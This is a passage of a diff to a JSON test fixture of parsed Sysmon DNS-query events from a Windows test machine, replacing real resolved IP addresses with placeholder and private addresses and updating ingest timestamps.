Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9321,17 +9225,17 @@ }, "answers": [ { - "data": "35.231.30.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.196.212.198", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "35.231.30.22", - "35.196.212.198" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -9346,14 +9250,13 @@ "x.bidswitch.net" ], "ip": [ - "35.231.30.22", - "35.196.212.198" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741730600Z", + "ingested": "2021-12-09T13:50:23.457094800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.231.30.22;::ffff:35.196.212.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9417,11 +9320,11 @@ "type": "CNAME" }, { - "data": "199.166.0.26", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9429,7 +9332,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9437,7 +9340,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9445,7 +9348,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9453,21 +9356,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.26", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -9483,22 +9386,22 @@ "pixel.adsafeprotected.com" ], "ip": [ - "199.166.0.26", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741736100Z", + "ingested": "2021-12-09T13:50:23.457101100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9557,19 +9460,19 @@ }, "answers": [ { - "data": "35.171.48.231", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.206.107.32", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.175.80.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9577,7 +9480,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9585,7 +9488,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9593,7 +9496,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9601,23 +9504,23 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "35.171.48.231", - "52.206.107.32", - "35.175.80.59", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -9632,24 +9535,22 @@ "ml314.com" ], "ip": [ - "35.171.48.231", - "52.206.107.32", - "35.175.80.59", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741741100Z", + "ingested": "2021-12-09T13:50:23.457106900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9709,15 +9610,15 @@ }, "answers": [ { - "data": "156.154.200.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "63.251.88.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9725,7 +9626,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9733,7 +9634,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9741,7 +9642,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9749,7 +9650,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -9758,17 +9659,17 @@ } ], "resolved_ip": [ - "156.154.200.36", - "63.251.88.56", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -9784,24 +9685,23 @@ "aa.agkn.com" ], "ip": [ - "156.154.200.36", - "63.251.88.56", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741746300Z", + "ingested": "2021-12-09T13:50:23.457112700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9865,11 +9765,11 @@ "type": "CNAME" }, { - "data": "172.217.10.134", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9877,7 +9777,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9885,7 +9785,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9893,7 +9793,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9901,21 +9801,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "172.217.10.134", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -9931,22 +9831,22 @@ "s0.2mdn.net" ], "ip": [ - "172.217.10.134", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741750500Z", + "ingested": "2021-12-09T13:50:23.457118400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -10014,17 +9914,17 @@ "type": "CNAME" }, { - "data": "23.50.53.195", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.185", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.195", - "23.50.53.185" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -10041,14 +9941,13 @@ "b.scorecardresearch.com" ], "ip": [ - "23.50.53.195", - 